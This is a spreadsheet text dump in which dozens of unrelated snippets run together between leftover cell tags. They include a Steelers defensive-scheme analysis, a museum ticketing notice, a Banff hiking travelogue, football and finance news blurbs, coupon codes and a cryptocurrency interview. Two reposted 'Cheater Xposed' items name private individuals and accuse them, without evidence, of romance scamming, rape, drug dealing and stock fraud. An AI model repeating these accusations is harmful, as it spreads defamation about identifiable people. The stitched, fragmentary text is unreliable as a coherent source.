Casey Hampton who can command double teams, eat up blocks and anchor the A-gaps against the run for several years now. Javon Hargrave is a good football player but not well-suited as a 3-4 nose. Daniel McCullers is well-suited as a 3-4 nose but not a particularly good football player. At outside linebacker, with the exception of TJ Watt, they have struggled recently to generate pressure. This is problematic, since the most important job of OLB’s in the 3-4 is to get to the quarterback. Jarvis Jones flamed out as a 3-4 edge rusher. Arthur Moats was limited. Bud Dupree is better in coverage than as a rusher but even there can be exploited by quicker slot receivers and backs in the flat. As offenses increasingly spread the field, having linebackers like Dupree covering receivers in space has exposed a weakness of the scheme. On the inside, the loss of Ryan Shazier robbed them of a sideline-to-sideline backer who could pursue from the backside. Vince Williams and Tyler Matakevich are tough as nails but better suited for the way football was played twenty years ago than it is today. The John Bostic and Sean Spence experiments did not go well. LJ Fort was a backup asked at times to be something more. In the secondary, a host of recent corners have struggled to play adequate cover-2, the coverage of choice under Mike Tomlin. And since the departure of Troy Polamalu and Ryan Clark, their safety pairings have lacked half-field chemistry and struggled as the box-filling tacklers cover-2 requires. In short, the Steelers became, somewhere in the turnover from the 2011 Super Bowl squad to their current iteration, a 3-4 defense short on 3-4 personnel. All of that is changing, however. The transformation of the defense from a 3-4 to more of a situational hybrid began a couple of seasons ago. It will be on full display in 2019. To call the Steelers a 3-4 team is no longer sufficient. They have assembled the pieces (on paper, at least) to be a legitimate matchup defense – a defense that can match its scheme to its personnel rather than trying to fit its personnel into a specific scheme. THE CONSTRUCTION OF A HYBRID DEFENSE The selection of Javon Hargrave in the 3rd round of the 2016 draft represented a turning point for the defense. With a clear need to upgrade from Steve McLendon at nose tackle, and with many clamoring for the team to take a prototypical 3-4 run stuffer like Baylor’s Andrew Billings to fill the void, the Steelers instead opted for the undersized (relatively-speaking) Hargrave from little-known South Carolina State. Hargrave’s selection was one of the first obvious signs the Steelers were moving away from their long reliance on the 3-4. He was better suited to penetrate or to slant and twist than to anchor a gap. His selection signaled the Steelers were looking more for athletic linemen who could compress run gaps and rush the passer. This would allow them to play more two-DL looks with their outside linebackers acting as de facto 4-3 ends. It would also put four potential pass rushers along the front, thereby decreasing their reliance on second-level blitzers to generate pressure. Subsequent drafts have been consistent with this desire to favor athleticism and versatility over 3-4 fit. TJ Watt, who was recruited to Wisconsin as a tight end, brought much needed agility to the outside backer spot when he was drafted in 2017 to supplant the stiff and ineffective Jones. Cam Sutton, whose size and speed made him desirable as a cover corner, particularly in man schemes, went in the third round of that draft. The 2018 1st round pick, safety Terrell Edmunds, was a massive upgrade athletically over Mike Mitchell, whose eroding skills limited his range and tackling ability. Fellow safety Marcus Allen was taken four rounds later in hopes he might fill the hybrid box safety role that was becoming so integral to the Steelers increasing reliance on sub packages. Even late round picks in the last few drafts like Sutton Smith, Ulysses Gilbert and Keion Adams have offered athleticism and versatility over fit. In free agency, the Steelers scooped upon freshly released Joe Haden from the Browns in 2017 less because Haden fit their long-preferred cover-2 but because he was an established professional cornerback who could play a variety of schemes. Haden’s arrival coincided with an increase in man coverage in Pittsburgh, likely not a coincidence. Their 2018 signing of Morgan Burnett was an overture to versatility as well. Though Burnett did not work out, the hope was he would fill the box safety role. That will now likely go to 2019 signee Mark Barron, with Allen a candidate to play there as well. Barron, a converted safety, represents significantly more speed at the second level than did both Burnett and last off-season’s other addition, John Bostic. Corner Steven Nelson was signed this off-season too, in part because he is young, athletic, and versatile. Even AAF refugee Kameron Kelly, who was signed this spring after the league folded, was recognized in training camp this week by Coach Tomlin for (you guessed it) his versatility. “He’s played some safety, he’s played some underneath sub packages,” Tomlin said. “He appears to have detail in multiple spots. That helps his case and ours.” Then there has been the quest to replace Ryan Shazier. There is no doubt the Shazier injury set this defense back substantially. A budding superstar, Shazier made everyone else on the field better with his ability to cover ground and demand attention. He was the type of player offenses had to game-plan for. Replacing him was no small assignment. The patchwork approach the Steelers attempted after Shazier went down in 2017 and again last season clearly failed. Optimism is high, however, that 2019 1st round selection Devin Bush will do a fair impersonation of Shazier at the second level for years to come. Bush is a modern sideline-to-sideline backer who can run, tackle and cover. He is well-suited for this evolving Steelers defense. Some of these acquisitions did not succeed as anticipated; for others, it is too early to judge. But each has shown a determination to reconstruct the defense by acquiring versatile players who can execute multiple roles to better match the chess moves made by opposing offenses. The hope of this strategy is to avoid being exploited by their reliance on a true base scheme. The 3-4 is still on the defensive card in Pittsburgh. It’s just not the main event anymore. SCHEMES, PERSONNEL AND SITUATIONS What should we anticipate, then? What schemes will we see from the Steelers, and when will we see them? Here are a few we can expect, with personnel and situations. 3-4 The 3-4 defense will feature a front three of Cam Heyward, Hargrave and Tuitt with rotational play from Tyson Alualu and maybe some short yardage snaps for McCullers if he can learn to play with better leverage. Watt, Dupree, Bush and Williams will be the backers, unless Barron eats into Vince’s reps. Nelson and Haden should start at corner, with Edmunds and Sean Davis at safety. We’ll see the 3-4 on obvious run downs or as a counter to heavier personnel groups like 12, 21 and 22. It should be our best run-stuffing group. Here is a classic 3-4 look against a 12 personnel set from Cincinnati. Safety Sean Davis is rolled down to the linebacker level as an 8th box defender because 12 personnel gives the Bengals eight run gaps. The Steelers are in a cover-1 look here but they could easily play quarters against this formation and retain good safety run support. The Steelers have a five-man front with three physical down linemen, two edge-setting linebackers and the ability to play three men at the second level. Offensive formations like these, which were so common twenty years ago, are the reason for which the 3-4 was constructed. 3-3-5 The 3-3-5 swaps out a backer for a fifth defensive back, so this would likely remove Williams in favor of Barron or Hilton, depending on whether the Steelers want that fifth DB to be more of a box or coverage player. If it’s Barron in the box safety role, this group could be used to match teams who are attempting to get to the edge with sweeps or outside zone plays or who are dinking and dunking the ball to backs and tight ends. Teams like Kansas City, Cincinnati and New Orleans come to mind. Removing Williams and inserting Barron with Bush inside and Watt (likely) in an overhang position gives the Steelers great lateral pursuit and tackling ability while retaining a sound four-man front with their three DL plus Dupree. If it’s Hilton as a slot corner, the idea would be to get after the quarterback. Hilton has shown himself to be an effective blitzer. From this look, the Steelers could twist, loop, come from both edges or come up the gut with Bush. It’s a great blitzing defense that retains sound rush and coverage capabilities. 2-4-5 This is the look I like best for the Steelers against 11 personnel groups with big tight ends and strong run games. It’s a two-DL look with the insertion of a box safety, likely Barron, which would essentially put another linebacker on the field. With Barron, our seven box defenders would be: DL: Heyward, Tuitt or Hargrave LBs: Watt, Dupree, Bush, Williams Box $: Barron Contrast that to last season: DL: Heyward, Tuitt or Hargrave LBs: Watt, Dupree, Bostic, Williams Box $: Burnett This defense is WAY more athletic with Bush and Barron at the 2nd level than with Bostic and Burnett. It matches up much better against single-back sets. The prevalence of 11 Personnel throughout the league, in fact, may have contributed to the off-season pursuit of Bush and Barron as the Steelers sought to match speed with speed. Teams may come at Barron in coverage but he won’t be asked to play much man. He is fine as a curl/flat defender. Instead of trying to “get by” with Burnett in the box, they will have an actual box player there. The run defense from this look will remain staunch. With two of Heyward, Tuitt and Hargrave penetrating at the 1 and 3-techs and Williams having speed on either side of him, running the ball in the A and B gaps will be difficult without a lead back. This will allow Bush to scrape faster over the top while Barron will be a major upgrade as a tackler over Burnett. And, whereas Burnett may have been slightly better in coverage than Barron, Bush should be significantly better than Bostic. They get an explosive slot blitzer in Barron, too, which could help offset any coverage issues. Here’s a 2-4-5 look with Burnett as the box safety. He is weak into the boundary because the Chiefs have put both of their receivers to the top of the screen: With Barron in this spot, they add a faster athlete and a better tackler at the second level. I’d certainly rather have Barron cleaning up sweep into the boundary, fighting through linemen to defend screen or pursuing the backside cutback alleys than Burnett. 2-4-5 Nickel If coverage is a problem, the Steelers can always go to true Nickel. This would likely be the same personnel as the 2-4-5 Box but with Hilton in the slot replacing Barron and Barron potentially bumping inside to replace Williams. This may be their defense-of-choice against 10 personnel looks or even some smaller 11 groups. Below we see this look with Hilton as the Nickel. It’s 2nd and 10, a passing down most likely, and the Steelers want a true defensive back to counter Cincinnati’s 11 personnel group. Hilton has proven reliable in that role. Should teams attempt to exploit him with bigger slot receivers, Cam Sutton, who is said to be off to a strong start at camp, could be a viable alternative. This could be an interesting battle to watch, actually. Hilton, who is on a one-year restricted tender and seeking a long-term contract from the Steelers, could be let go after this season if the bigger, younger (and potentially cheaper) Sutton proves reliable. 2-3-6 (Dime) When the Steelers want to maximize their coverage ability, they now have the athletes to play an effective Dime package. Below is a shot of the Dime look the Steelers had success with in their game last season against New England. The back six consists of three corners (Sensebaugh, Hilton and Haden) and three safeties (Burnett, Edmunds and Davis). This season, Nelson will be an upgrade at corner in this package and Barron or Allen (or perhaps even Kameron Kelly) will offer more athleticism than Burnett. The beauty of this look is how it lets the Steelers mask and rotate coverages. Look carefully at the photo. What coverage is this? It looks like cover-1 but it could just as easily morph into cover-2, 3 or quarters. As a matter of fact, this actually becomes cover-2 post-snap as Edmunds drops to a deep half, Davis rotates out of the middle to take the other deep half and Burnett sinks into the high hole. One of the reasons the Steelers held the Patriots to 10 points in this game was their ability to disguise their coverages out of Dime. If they can play sound run defense on early downs and put teams in passing situations, they now have t...</t>
  </si>
  <si>
    <t>It’s a compliment of sorts when your museum is so popular that it has to stop allowing people to just turn up and visit. That’s the curse of the Sir John Soane museum which has been seeing the queues outside getting progressively longer and longer, to the point where they’ve given up the unfettered access. From 1st August, you will nee a timed entry ticket to go into the museum. (c) Sir John Soane Museum While that pretty much kills off the “wandering around the area and might pop in”, it does mean for the considerably larger number of people who make a special trip to the museum, they wont have to stand outside any more. The museum will continue to be open Wed-Sun, and closed on Mon/Tues. Although entry is free, they are asking for a suggested donation of £10. To book tickets now, and forever more, go here.</t>
  </si>
  <si>
    <t>One of the Alps’ most beautiful peaks is the Matterhorn. Climbing to the top is challenging, but also frustrating because of crowds. Source: Sports Business News</t>
  </si>
  <si>
    <t>Penny Travers And Jordan Hayne</t>
  </si>
  <si>
    <t>ACT Chief Police Officer Ray Johnson describes 116 illegal accesses of metadata as an "administrative oversight" after a report found cases in 2015 in which police in the ACT and WA did not obtain proper authorisation.</t>
  </si>
  <si>
    <t>Jurgen Klopp has identified Idrissa Doumbia as a transfer target after the midfielder impressed during Sporting Lisbon's friendly with Liverpool</t>
  </si>
  <si>
    <t>Fantasy Football Scout are delighted to announce our partnership with FanTeam for the 2019/20 season. This year they ...</t>
  </si>
  <si>
    <t>Failure to conduct due diligence around minimum wages or to intentionally skim from workers is unacceptable.</t>
  </si>
  <si>
    <t>The majority of South Sydney players were pleasantly surprised when they saw club great Greg Inglis at Redfern training for the first time since Magic Round.</t>
  </si>
  <si>
    <t>Jedda Costa</t>
  </si>
  <si>
    <t>A Melbourne cyclist who suffered a fractured skull, neck and eye socket when he was hit by a car in Melbourne's north is pleading with the public to help identify the driver responsible.</t>
  </si>
  <si>
    <t>If you place insurance for construction clients, they could be signing contracts that saddle them with risks that they should not be taking on. “We are beginning to see tenders coming out where not enough design work has been done… The post How construction clients could be taking on too much risk appeared first on Canadian Underwriter.</t>
  </si>
  <si>
    <t>Travel Like This</t>
  </si>
  <si>
    <t>The massive peak-to-peak views on the way to Healy Pass. Photo: Lisa Monforton As we gaped in awe at Talc Lake, a deep blue expanse hanging above Egypt Lake in the distance, a passing hiker said to us, “It only gets better.” Better than this? we wondered. How is that possible? In the vista before us, a waterfall ribbon from Talc seemed to put the cherry on top of this stunning view on our day-long trek from Sunshine Village to Shadow Lake Lodge. We’d left Sunshine Village at 8:45 a.m. for the 24- or 27-km hike to Shadow Lake Lodge, depending on which route you take. The two properties in Alberta’s Banff National Park are offering what they call a hut-to-hut hike this year for the first time (See package details below). Alison Brewster, proprietor of Shadow Lake Lodge, has been wanting to bring the spirit of the European hut-to-hut mountain experience to Banff. “I have been thinking about it for a few years,” says Allison. She and her daughters hiked to Sunshine from Shadow Lake last year and set the plan in motion with the fact that Sunshine Mountain Lodge is now open all summer and the gondola runs seven days a week. To be clear, this is a trek for fit hikers who are sure they can go the distance, says Brewster, who’s been traversing these mountains since she was 12. It’s not so much the elevation gain (the highest gain is around 600 metres along the way), it’s the length. “It’s not for everybody,” says Brewster. We weren’t sure we’d fit the bill – the longest hike we’d ever done in a day was Bourgeau – a 17-km up-and-back trek. What’s eight or 10 more kilometres? we said. Sunshine Meadows has several easy trails surrounded by mountain views and three pretty lakes. Photo: Lisa Monforton Here’s what to expect when you do the hut-to-hut hike. After being whisked up to Sunshine Mountain Lodge via gondola, we spent a restful evening soaking in the outdoor hot tub and chatting with other visitors, most of them from the U.S. We told everyone why we were here, to stay overnight at Sunshine relaxing, eating and maybe having a glass of wine or two before setting off the next day for Shadow Lake Lodge. They were intrigued. We’d planned to do a little pre-big-day hike in Sunshine Meadows off the Standish chair, but the area was closed because of a wildflower-feasting grizzly near one of the three lakes. This is a rare occurrence, so don’t let that stop you from planning a day hike at Sunshine or a stay at the hotel. It’s easy and offers epic views of Simpson Valley and Mount Assiniboine (the “Matterhorn of the Rockies”). The three lakes in the meadows are the perfect place for a picnic. After a hearty breakfast at the Chimney Corner restaurant, we picked up our sizable lunch (provided as part of the package) and set out on what would become a nine-hour hike (build in at least an hour for a lunch stop and photo ops). Heading up the Wawa green ski run, we walked past burbling streams, carpets of wildflowers and took in the smell of pine in the air on a warm day. The Simpson Pass trail is gentle and studded with wildflowers – yellow glacial lilies, cream-coloured buttercups and brilliant red paintbrush. The occasional deer sauntered across the trail. Constant birdsong provided our trail music. Alpine buttercups are just one of the many wildflowers in full bloom in July. Photo: Lisa Monforton Simpson Pass trail connects to Healy Pass, which tops out at 2,330 metres. You’re surrounded by subalpine beauty, and the school gymnasium whistle of the pikas echoes through the trees. Clear signage ensures you’ll have no trouble finding the trail to Egypt Lake, the halfway point to Shadow Lake Lodge. The trails are well signed on your way to Egypt Lake through the Healy Pass Trail. Photo: Lisa Monforton Four hours in, the amazing subalpine terrain descends into a dense forest of larch, pine, more wildflowers down to Egypt Lake. This is a popular backcountry camping spot for hikers, including a park-operated shelter. For us, it’s a quick lunch stop and bathroom break. We talk about coming back so we can explore this area named in the early 1900s for all things Egyptian – Scarab, Sphynx and Pharaoh lakes, to name a few. We’re not sure which is prettier, the views or the reflections of the views at Egypt Lake. Photo: Doug Firby It’s at this point we decide to take the shorter route to Shadow Lake Lodge, Pharaoh Creek Trail, rather than the longer and, by all accounts, more scenic Whistling Pass and past Haiduk Lake, which would add on a few extra kilometres. Even in early July, Whistling Pass can be snow-covered like it was on this day, making our decision even easier. Nurse trees are so cool to see – fallen timbers that are sprouting new life on the forest floor. Photo: Doug Firby One of the biggest treats of hiking so deep into Banff National Park is that you can go for hours without seeing or hearing a soul. Hiking Pharaoh Creek Trail, we see no one until we get within a couple of kilometres of Shadow Lake Lodge. We stop every so often to see if we can spot wildlife around the creek and at one point, we’re sure we see a couple of grizzlies hanging along the shore – not surprising given we’ve seen plenty of bear scat. At intervals, all we can hear is the rushing sound of the water and our occasional “Yo, bear!” shouts, which echo through the trees. An incredible, family-style, multi-course dinner is our reward after a long but oh-so-gorgeous hike to Shadow Lake Lodge. Photo: Shadow Lake Lodge It’s getting close to 5:30 p.m. and we see the sign – 2.4 kms to Shadow Lake Lodge. We’re exhausted but have enough energy for a high five. It takes us about 30 minutes of steady climb to reach the welcome sight of the entrance to the lodge. Though we’ve missed the 4 p.m. afternoon tea, we’ve got 30 minutes to spare before 6:30 dinner. The sound of a cowbell brings guests out of their cabins. The staff carts out platter after platter for an incredible family-style feast that includes soup, homemade bread, pork tenderloin with a berry glaze and balsamic reduction, steamed rice and broccoli and a Greek salad. We can barely stand from our seats with full bellies and stiff legs to make it to our comfy bed, where we sleep for straight 10 hours. At the moment, this is the “better than this” our fellow hiker earlier in the day had foretold. A cozy cabin with a veranda and stunning views greets guests at Shadow Lake Lodge. Photo: Shadow Lake Lodge When you go: The Hut to Hut package includes: Gondola ride up to Sunshine Mountain Lodge Dinner at either Eagles Nest Bistro, Chimney Corner or Mad Trapper’s Smokehouse Overnight stay Packed lunch from Java Lift Coffee Bar for your hike Two-night stay with meals at Shadow Lake Lodge (wine and beer is served, but you can also bring your own drinks) Find details at the Shadow Lake Lodge or Sunshine Mountain Lodge. What to bring: Because this is a long hike, be sure to pack light with just the essentials. Pack along extra snacks and water Bear spray/bear noise maker Bugspray Layers for changing weather and rain gear. Doug Firby and Lisa Monforton were guests of Sunshine Village and Shadow Lake Lodge. Content was not subject to approval. © Travel Like This The views, opinions and positions expressed by columnists and contributors are the author’s alone. They do not inherently or expressly reflect the views, opinions and/or positions of our publication. The post Hut-to-hut hike rewards adventurers with epic views appeared first on West-Central Cross Roads.</t>
  </si>
  <si>
    <t>The company has been unable to deliver any 737 MAX aircraft since the plane was grounded worldwide in March after two fatal crashes that killed 346 people.</t>
  </si>
  <si>
    <t>Adventurous Drive from Fatula Top to Leh, INB Trip EP #64 The post Adventurous Drive from Fatula Top to Leh, INB Trip EP #64 appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>New boss Frank Lampard says the Blues' progress has been 'really good' following a 2-1 friendly victory over La Liga giants Barcelona in Japan.</t>
  </si>
  <si>
    <t>This Mylyn Yampan from Baguio Philippines did a job for me and we started romance knowing she has one son and no husnand that left years ago, we wanted to go on vacation she insist will meet in cebu not at her home in Baguio.Had some wild time started talking serious relationship, she is well spoken and very convincing, after a. week she needed to go home but refuse to let me go with her, she told me father is sick and mom need to admit to,mental hospital she was begging that ill help her with hospital bills and so I gave her $1500 . I went back to the US and never hear from her I manage to talk to 2 of her friends because she works at a photo shop called Hijo De Photo and the were laughing they told me she does this trick to many forighners ,her parents are fine and she live with her husband at her parents home. They said she give bad name to many filipinas that are nice and decent. So guys be careful never trust until you trust The post Snraky Tricky Mylyn Yampan – Expose Homewreckers appeared first on Cheater Xposed - Cheater Exposed USA.</t>
  </si>
  <si>
    <t>Katina Curtis, AAP Senior Political Writer</t>
  </si>
  <si>
    <t>Labor will push for parliamentary scrutiny of the rate of Newstart after it resolved to keep up a campaign to get the unemployment payment increased.</t>
  </si>
  <si>
    <t>Isabel Moussalli</t>
  </si>
  <si>
    <t>A team of scientists in Western Australia will investigate how to turn an iconic lake pink in a project believed to be an Australian first.</t>
  </si>
  <si>
    <t>Juventus are ready to cash-in on Paulo Dybala and sell the attacker to Manchester United as long as the Red Devils pay at least £70m</t>
  </si>
  <si>
    <t>Measureschool</t>
  </si>
  <si>
    <t>https://bit.ly/2PctE6V Implement Facebook Pixel consistently and track conversions and events easily with the help of Google Tag Manager. #FacebookPixelTracking … source</t>
  </si>
  <si>
    <t>Henrik Larsson's Return To Celtic Park Will Give You Goosebumps Celtic’s legendary striker Henrik Larsson received a rapturous welcome on his return to Celtic Park last year. Larsson, who signed from Feyenoord for just £650,000 in 1997, spent seven incredibly successful years at the club where he scored 174 goals in 221 appearances. I mean, just look at the following stats. This man was a machine back in the 90’s. Henrik Larsson’s Celtic Stats Games: 315 Goals: 242 European Goals: 35 Trophies: 8 SWFA Player of the Year: 2 PFA Player of the Year: 2 European Golden Boot: 1 pic.twitter.com/Al43q9F1Sb – Focus on Celtic (@FocusOnCeltic) May 16, 2018 Larsson forged a special relationship with the fans during that time and today, he was given an incredible reception on a special day for midfielder Scott Brown. With just half an hour to play, another Celtic legend, Martin O’Neil, decided to bring on the 46-year-old in a memorable moment for those in attendance. Just listen to the reception he receives after replacing Charlie Mulgrew. What a moment. Celtic’s official Twitter account soon announced his arrival on social media and as expected, fans went nuts. The King is :house_with_garden:… Henrik Larsson comes on with just under half an hour to play! :crown: #Broony10 pic.twitter.com/krEvEOLELI – Celtic Football Club (@CelticFC) May 20, 2018 That’s Henrik Larsson over there. Fucking Henrik Larsson. #King #Broony10 pic.twitter.com/ICuvbN2v3D – Alan Lappin (@GiggsyBlantyre) May 20, 2018 One of the greatest players of his generation, and Henrik Larsson. pic.twitter.com/ELXAIobBFQ – northwest (@northwestpne) May 20, 2018 Scott Brown’s testimonial eventually finished 2-2 and Larsson was close to netting in the second half, but was denied by goalkeeper Conor O’Malley. He then produced a very wayward free-kick, which were never his best attribute during his playing days. Conor O’Malley makes a fine stop to deny Henrik Larsson from close range – which is something O’Malley probably wasn’t ever expecting to do in his life – Daniel McDonnell (@McDonnellDan) May 20, 2018 A sentence I did not expect to be writing this week, but a superb save from Conor O’Malley to deny Henrik Larsson from close range – Paul O’Hehir (@paulohehir) May 20, 2018 We’re pretty sure he’d still do a job for Celtic, nowadays. This post Henrik Larsson's Return To Celtic Park Will Give You Goosebumps appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>Sterling continued to drop against the dollar and the euro amid the government’s toughened stance on Brexit. Read more? Click here</t>
  </si>
  <si>
    <t>People with lung cancer are sharing their stories, saying they need more support as they struggle with the leading cause of cancer deaths in Australians.</t>
  </si>
  <si>
    <t>The NSW Finance Minister Damien Tudehope says the community "will not stand" for a bill to decriminalise abortion.</t>
  </si>
  <si>
    <t>Police have appealed for information about three men who allegedly approached young women in separate incidents between August last year and May this year.</t>
  </si>
  <si>
    <t>Lyn Maccallum</t>
  </si>
  <si>
    <t>Ceremony overshadows sport, social service increase, and a poor response.</t>
  </si>
  <si>
    <t>Patrick Hatch</t>
  </si>
  <si>
    <t>A backroom player in ASX-listed childcare group G8 Education's ill-fated takeover bid for smaller rival Affinity Education will face trail for lying to the corporate cop about his involvement.</t>
  </si>
  <si>
    <t>Source: The second LIVE episode of the Space News Pod! Please let me know what you think on social media @spacenewspod. ==== MagellanTV – a brand-new streaming service that features the very best collection of space and science documentaries available anywhere. The service includes over 1500 documentary movies, series, and exclusive playlists, designed with you […] The post LIVE: SpaceX, Space Travel, Space Tourism, NASA and MORE! appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Actor will appear posthumously in the third Descendents film this year See full article at Independent.co.uk » The post Cameron Boyce: Disney star’s death caused by epilepsy, coroner’s report confirms appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Procter &amp; Gamble Co's quarterly revenue and profit beat Wall Street expectations on Tuesday, sending shares up even as the world's No.1 personal goods company took an $8 billion writedown on its Gillette shaving business.</t>
  </si>
  <si>
    <t>Gemma's mum Bernie has certainly made an impression in the short time she's been on the Street. I...</t>
  </si>
  <si>
    <t>Clifford Starke is a stupid and crazy psychopath/drug dealer/rapist/insider trader/loser who pumps and dumps stocks and screws people over. He also pays hookers and strippers to have sex with him. He tried to buy the Montreal Alouettes, but they wouldn’t sell to him because he is such a sleazy scumbag. Do not do any business with this psychopath, he is a pathological liar and he will only cause you problems and damage. The post Clifford Starke is a Psychopath Criminal appeared first on Cheater Xposed - Cheater Exposed USA.</t>
  </si>
  <si>
    <t>The man was treated at the scene but couldn't be saved. Road closures were in place just after the township.</t>
  </si>
  <si>
    <t>kellie43</t>
  </si>
  <si>
    <t>COUPON CODES SPECIAL 8% OFF for entire order GKA10 10% OFF for New Arrivals - Minimum purchase of 2 items GKJS12 12% OFF for Jumpsuits &amp; Rompers - Minimum purchase of 2 items GKPS15 15% OFF for Plus Dresses - Minimum purchase of 3 items NEWOFFER 12% off best sellers *Copy and use it when checkout *Limited to use one code per time *All codes only work on gracekarin.com</t>
  </si>
  <si>
    <t>David Lynn</t>
  </si>
  <si>
    <t>Imagine a picture titled ‘the new season’, it’s a picture of St James Park and we are all in that picture. Where do you put yourself? Last season I would imagine myself in a seat right on halfway, leaning forward, eyes fixed on the centre spot, full of…hope, expectation, excitement, passion, defiance? All qualities which pump the heart and warm the blood. This season I am standing outside the Strawberry looking across the road from a distance. I’m out. Don’t get me wrong, if I was still living in Newcastle I would have stopped attending games two or three years ago. A small gesture but my own. Things changed with the decision to ignore and ditch Benitez. We had momentum, we were going forward, we had a plan, he was the man with the plan and we were behind him, the players were behind him, the owner was behi…sorry, against him totally. Did Rafa’s business plan enable Mike Ashley to extract the competitive life out of the club? Did it enable him to extract Sky money with a minimum outlay for maximum profit? Would it involve the maintenance of a zombie football club, suspended between 10 h and 17th position, unable to break into the sunlit uplands of the top six forever? It didn’t, so Ashley ignored him. And now we have Steve Bruce and didn’t we know it would be five minutes before we got the stories about bleeding black and white and what his Mam and Dad would say and he’s just a down to earth bloke and did he mention he’s a Geordie? Bruce’s apparent contemptuous treatment of Sheffield Wednesday casts a shadow over the whole ‘When The Boat Comes In’ stuff but I tell you what, it makes him a perfect fit (albeit an 11th choice fit) for this riff-raff of a club hierarchy. So when I say I’m out, what I mean is not just that I would not attend home games or buy merchandise that gives any of my money to Ashley, I also mean that I no longer care whether they beat Arsenal in that first game or not….in fact I would rather they got absolutely blown off the park. Let’s see them fail abjectly all season and hear Bruce bleat out the same s*** Carver did. We need to take Ashley’s income away, no sky money, no merchandise, no tickets. How is it possible that I can will those players to win last season and then be content to see them ship 4, 5 or 6 goals this year? Tough love. We will never be in a better position to become a truly competitive club under Ashley, than when Benitez was here. Ashley knows that and he stopped it and reverted to type. Hence Steve Bruce. It will never be healthy again under Ashley. I love Newcastle United. It is our team, our city but it is time, for its own good, for tough love. Every game should be boycotted. Boycotts need to be affirmative, positive experiences. It needs to be against attending, but for the club, our club, our city. Can the city council be involved? MPs? Shearer? The Ronny Gill, Ant and Dec. You get the idea, anyone and everything that makes it attractive to fans to stop attending. Live music in Leazes Park? Free screening of the match in local cinemas? Regular mass attendance at local non-league games giving Ashley’s revenue to those clubs. Encourage opposition fans to donate something, how about badges that can be awarded for non-attendance? I don’t know! Someone else must be thinking the same as I am. Are you? I cannot support another team, Newcastle United is family. But sometimes it needs to be tough love. (Fancy writing for us? Send any articles/ideas over to us at NUFCblogsubmissions@gmail.com &amp; we’ll get back to you!)</t>
  </si>
  <si>
    <t>Key Highlights “There is, from an enterprise standpoint, a desire to engage in this new technology and in this ability to move money globally without any barriers at a very efficient cost basis. Speed is what the market is looking for, particularly as we move towards a global organization. Governments are still trying to regulate their own little boundaries and limit the transfer of money, of intellectual property, of trade. And I think that’s the barrier that all of us are trying to break down.” “I think innovation is happening on two folds. One is the consumerization of innovation and the other is the depths of innovation in terms of technology, in terms of the ability to provide the technology in a “non-custodial fashion.” I can either build innovation around custody or around non-custodial services. And blockchain has enabled non-custodial – what does that mean? That basically means the control is in me, the user, and the responsibility lies with me as the individual. Innovation on a non-custodial basis is very hard to attack and diffuse.” “The value is not in intellectual property, it’s in the ecosystem that I have developed that is contributing to the overall blockchain, or Bitcoin.cash, or whatever the underlying algorithm is.” Listen to the podcast version In April 2012, Stefan Rust bought Bitcoin for the first time, at $5. Now, 7 years later, he is CEO of Bitcoin.com, a company that aims to make Bitcoin Cash and Bitcoin Core alike more accessible to the general public, and that is home to all manner of cryptocurrency services via its eponymous web portal. In this episode, our Editor-in-Chief Angie Lau sits down with Rust to talk about the future of cryptocurrencies and blockchain technology. Recent events including the U.S. Senate Banking Committee’s hearing on Facebook Libra, President Trump and US Treasury Secretary Mnuchin’s pessimistic comments, and the Financial Action Task Force’s tightening regulations have been indicative of a global pushback against Facebook Libra and cryptocurrencies at large. Rust argues that this skepticism and distrust of cryptocurrency is a product of the underlying reluctance of government to depart from their traditional regulation of borders and limitations on transfer “of money, of intellectual property, of trade.” Rust also speculates that national governments do not trust big tech companies with large amounts of data – a speculation that is supported by copious amounts of evidence in recent years. However, what Rust asserts is that unlike what governments believe, the value of cryptocurrency is not in intellectual property or in the data it comprises, but in the ecosystem of contributors to a code base that is open source – a code base made possible by blockchain technology. Despite government regulations and consumer skepticism, Rust expects the changing demographics of the global population to popularize cryptocurrency. Government backlash to Facebook Libra stands in stark contrast to the increasing adoption of cryptocurrencies all over the world; much like the Internet boom of the 90s, bureaucratic mistrust may be indicative of a revolutionary new technology. Full Transcript I’m Editor-in-Chief, Angie Lau, and today we’re going to be focusing on this increasing global pushback, this almost backlash, if you will, against blockchain and cryptocurrency. And sitting right next to me to explore a little deeper on that is a man who bought Bitcoin at $5, so I would say he’s pretty prolific in the space. Welcome to Stefan Rust, the newly-minted CEO of Bitcoin.com. So, welcome Stefan, you’ve been traveling a lot. I’ve been traveling a lot as well. We talk to a lot of people. You talk to the people who are really in the weeds, the entrepreneurs, the blockchain projects, and they’re feeling the heat. Thanks for having me. First of all, definitely, you’re seeing some changes. We talked about it a bit earlier but governments are beginning to feel the heat as well, I think more so than the actual entrepreneurs; entrepreneurs are loving the change. They love fluidity, so that way they can find and navigate opportunities. And in change are always opportunities and so entrepreneurs are really liking this. It’s just a sign that regulators are beginning to get really nervous, as state and money begin to separate, and I think we’re trying to drive that separation more and I think crypto is enabling a lot of that, very similar to church and state, how those two separated – how do we separate money and state? That’s a really interesting concept that I’d love to explore because right now in India, for example, they’re looking at a proposal that anybody who’s trading crypto could face a 10-year jail sentence. And then you have the US Treasury Secretary this morning, Steven Mnuchin, saying that Bitcoin is not going to exist in a couple of years, that it is an asset that has no value, echoing the words of US President Donald Trump, who also said something very, very similar. So why is this almost happening now? Is it the Facebook Libra effect? I think that the aggregation of companies involved in Libra, the magnitude of the size of companies involved in Libra is just showing that there is, from an enterprise standpoint, a desire to engage in this new technology and in this ability to move money globally without any barriers at a very efficient cost basis. Speed is what the market is looking for, particularly as we move towards a global organization. Governments are still trying to regulate their own little boundaries and limit the transfer of money, of intellectual property, of trade. And I think that’s the barrier that all of us are trying to break down. And government’s not playing along in that game. Well, why would they? I mean, you have central banks around the world who are charged to make sure that their domestic economy sustains within a global economy and that means the ability to control inflation to possibly create hard or soft landings for any business cycle. Cryptocurrency removes that power away from central banks. Is this a good thing for us? We believe so. And if you look at 2008, who benefited from all of that printing of new money? Has it been distributed to the whole population? Have people in Wyoming or in Chicago, in the outskirts of Chicago, had their water pipes upgraded so that they don’t get rusty water out of the taps? Has that ever happened through all that new money that’s been printed? Has that infrastructure been improved for the general population in the middle of the US? And I think a lot of the population just haven’t seen that. They’ve seen this money be printed, these financial institutions be rewarded for a disaster that has been created by these new financial instruments that were created, and the benefit has not been 